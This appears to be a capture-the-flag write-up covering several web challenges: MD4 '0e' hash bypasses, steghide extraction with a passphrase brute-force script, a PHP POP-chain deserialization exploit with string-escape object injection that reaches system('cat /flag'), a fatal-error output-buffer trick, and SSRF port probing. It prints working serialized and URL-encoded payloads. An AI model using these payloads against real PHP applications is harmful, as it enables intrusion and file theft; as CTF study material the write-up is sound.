主动
Command execution; only the keyword flag is filtered, so a wildcard bypass is enough.
Funhash
Level 1: bypass with a value of the form 0e followed only by digits whose MD4 hash is again of the form 0e followed only by digits.
hash1=0e399638706240815825137256701449
The hard part is that no value meeting this requirement can be found online; you have to write a collision script yourself.
https://www.cnblogs.com/-mo-/p/11582424.html I took the MD5 version from here and modified it, then ran it for half a day without a result; luckily a teammate got one.
Levels 2 and 3 can be done with arrays.
Level 4 is the same as this article; use it directly: https://blog.csdn.net/iczfy585/article/details/106081299
?hash1=0e399638706240815825137256701449&hash2[]=2&hash3[]=3&hash4=ffifdyop
upload
The attachment is a packet capture in which you can see an image file being uploaded, and the hint says the file was processed with steghide.
driftnet -f data.pcapng -a -d /root/Desktop
This carves out one image.
Then use steghide to extract the hidden file: steghide extract -sf 1.jpg -p 123456
The password here can simply be guessed, or brute-forced with a script.
#!/bin/bash
# bruteStegHide.sh: try every line of a wordlist as the steghide passphrase
# usage: ./bruteStegHide.sh <cover file> <wordlist>
while IFS= read -r line; do
    # steghide exits 0 only when the passphrase is correct and data is extracted
    steghide extract -sf "$1" -p "$line" > /dev/null 2>&1
    if [[ $? -eq 0 ]]; then
        echo "password is: $line"
        exit 0
    fi
done < "$2"
./bruteStegHide.sh test.jpg passwd.txt
Two more challenges I did not solve; I went through them following ying's writeup:
https://www.gem-love.com/ctf/2576.html
web辅助
This challenge is a POP chain plus a string escape.
- In the topsolo class, midsolo is called as a method -> midsolo triggers __invoke() ->
Gank() runs stristr($this->name, 'Yasuo'); by setting name to a jungle object ->
jungle triggers __toString() -> KS() -> system('cat /flag')
The stristr() function
At the time I never thought that stristr($this->name, 'Yasuo'), which searches name as a string, could also trigger __toString(); I looked around and every echo was hardcoded, so I did not know what to do.
I tested it myself:
<?php
class TestClass
{
    public $foo;
    public function __construct($foo)
    {
        $this->foo = $foo;
    }
    // Runs whenever the object is used as a string, including inside stristr()
    public function __toString() {
        echo "Yasuo is best!<br/>";
        system("dir");
        return "Yasuo";   // __toString() must return a string
    }
}
function Gank($class){
    // stristr() converts $class to a string, which triggers __toString()
    if (stristr($class, 'Yasuo')){
        echo "Are you orphan?\n";
    }
    else{
        echo "Must Be Yasuo!\n";
    }
}
$class = new TestClass('Hello');
Gank($class);
?>
<?php
// Build the chain topsolo -> midsolo -> jungle and print its serialized form.
// Protected properties serialize as "\0*\0name", which is why the key is s:7.
class topsolo{
    protected $name;
    public function __construct($name = 'Riven'){
        $this->name = $name;
    }
}
class midsolo{
    protected $name;
    public function __construct($name){
        $this->name = $name;
    }
}
class jungle{
    protected $name = "";
    public function __construct($name = "Lee Sin"){
        $this->name = $name;
    }
}
$aa=serialize(new topsolo(new midsolo(new jungle)));
echo $aa;
?>
O:7:"topsolo":1:{s:7:"*name";O:7:"midsolo":1:{s:7:"*name";O:6:"jungle":1:{s:7:"*name";s:7:"Lee Sin";}}}
There is also a __wakeup() to bypass by changing the property count; otherwise name cannot be set to the value we need.
There is also a check function that filters the keyword name; bypass it with hex encoding by using the S: string type and writing name as \6E\61\6D\65.
O:7:"topsolo":1:{S:7:"*\6E\61\6D\65";O:7:"midsolo":3:{S:7:"*\6E\61\6D\65";O:6:"jungle":1:{S:7:"*\6E\61\6D\65";s:7:"Lee Sin";}}}
Then comes the string escape: each \0*\0 group swallows 2 characters, and the segment ";s:7:"0*0pass;s:155:" (22 characters) has to be swallowed.
For a detailed explanation of object injection caused by PHP string escape, this is much like the DASCTF April challenge: https://blog.csdn.net/weixin_43610673/article/details/105754341
?username=test\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=;s:4:"test";O:7:"topsolo":1:{S:7:"*\6E\61\6D\65";O:7:"midsolo":3:{S:7:"*\6E\61\6D\65";O:6:"jungle":1:{S:7:"*\6E\61\6D\65";s:7:"Lee Sin";}}}s:1:"a";s:1"a
Finally URL-encode it:
?username=test%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0&password=%3Bs%3A4%3A%22test%22%3BO%3A7%3A%22topsolo%22%3A1%3A%7BS%3A7%3A%22%00%2A%00%5C6E%5C61%5C6D%5C65%22%3BO%3A7%3A%22midsolo%22%3A3%3A%7BS%3A7%3A%22%00%2A%00%5C6E%5C61%5C6D%5C65%22%3BO%3A6%3A%22jungle%22%3A1%3A%7BS%3A7%3A%22%00%2A%00%5C6E%5C61%5C6D%5C65%22%3Bs%3A7%3A%22Lee+Sin%22%3B%7D%7D%7Ds%3A1%3A%22a%22%3Bs%3A1%22a
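The string escape described above, as an added example that is not part of the original post or the challenge: a minimal Account class (assumed names) whose serialized form is passed through a filter that shrinks every literal \0*\0 by two bytes, so the declared string length overruns into the attacker-controlled password field; the second half filters before serializing and shows why that order is safe.

```php
<?php
// Added example (not the challenge code): minimal reproduction of the string
// escape. Class, field names and the filter are assumptions mirroring its shape.
class Account
{
    public $username;
    public $password;
    public $admin = false;   // property the injected data will overwrite
}

// Like the challenge filter: each literal 5-character \0*\0 becomes the 3-byte
// sequence NUL * NUL, so every match shrinks the data by 2 bytes.
function shrink_filter(string $data): string
{
    return str_replace('\0*\0', "\0*\0", $data);
}

$acct = new Account;
// 12 groups shrink by 24 bytes: exactly `";s:8:"password";s:43:"` (23 bytes)
// plus the leading x of the password, so the declared s:64 overruns into it.
$acct->username = 'test' . str_repeat('\0*\0', 12);
// 43 bytes. It begins with `";` to close the username early and then supplies
// the two remaining properties itself; the real tail is left as ignored junk.
$acct->password = 'x";s:8:"password";s:1:"x";s:5:"admin";b:1;}';

// Vulnerable order: filtering AFTER serialize() breaks the length prefixes.
$tainted = shrink_filter(serialize($acct));
var_dump(unserialize($tainted)->admin);

// Fixed order: filter the field BEFORE serialize(), so prefixes stay consistent
// and the payload remains an inert substring of the password.
$safe = new Account;
$safe->username = shrink_filter($acct->username);
$safe->password = $acct->password;
var_dump(unserialize(serialize($safe))->admin);
```

Only the vulnerable order yields admin = true; the fixed order keeps the payload inside the password string.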
half_infiltration
<?php
highlight_file(__FILE__);
$flag=file_get_contents('ssrf.php');
class Pass
{
function read()
{
ob_start();
global $result;
print $result;
}
}
class User
{
public $age,$sex,$num;
function __destruct()
{
$student = $this->age;
$boy = $this->sex;
$a = $this->num;
$student->$boy();
if(!(is_string($a)) ||!(is_string($boy)) || !(is_object($student)))
{
ob_end_clean();
exit();
}
global $$a;
$result=$GLOBALS['flag'];
ob_end_clean();
}
}
if (isset($_GET['x'])) {
unserialize($_GET['x'])->get_it();
}
But there is an output buffer here, so otherwise nothing gets printed: ob_end_clean() would discard it, so a fatal error has to be constructed to skip that call (this is exactly where I got stuck during the competition).
<?php
// Two User objects in one array: the first destructor stores the flag into the
// global $result; the second prints it into the buffer and then hits a fatal
// error on global $this, so ob_end_clean() never runs and the buffer is flushed.
class Pass{
}
class User{
    public $age,$sex,$num;
}
$q = new User;
$q->age = new Pass;
$q->sex = 'read';
$q->num = 'result';
$c = new User;
$c->age = new Pass;
$c->sex = 'read';
$c->num = 'this';   // global $$a becomes global $this -> fatal error
$ser = serialize([$q,$c]);
var_dump($ser);
?>
?x=a:2:{i:0;O:4:"User":3:{s:3:"age";O:4:"Pass":0:{}s:3:"sex";s:4:"read";s:3:"num";s:6:"result";}i:1;O:4:"User":3:{s:3:"age";O:4:"Pass":0:{}s:3:"sex";s:4:"read";s:3:"num";s:4:"this";}}
<?php
// Scanning confirmed there are no internal services on ports below 35000 or above 50000; please continue penetrating the intranet
$url = $_GET['we_have_done_ssrf_here_could_you_help_to_continue_it'] ?? false;
if(preg_match("/flag|var|apache|conf|proc|log/i" ,$url)){
die("");
}
if($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_exec($ch);
curl_close($ch);
}
?>
Brute-forcing the ports shows an upload function on port 40000:
/ssrf.php?we_have_done_ssrf_here_could_you_help_to_continue_it=http://127.0.0.1:40000
I could not get any further past this point, possibly because the competition had already ended.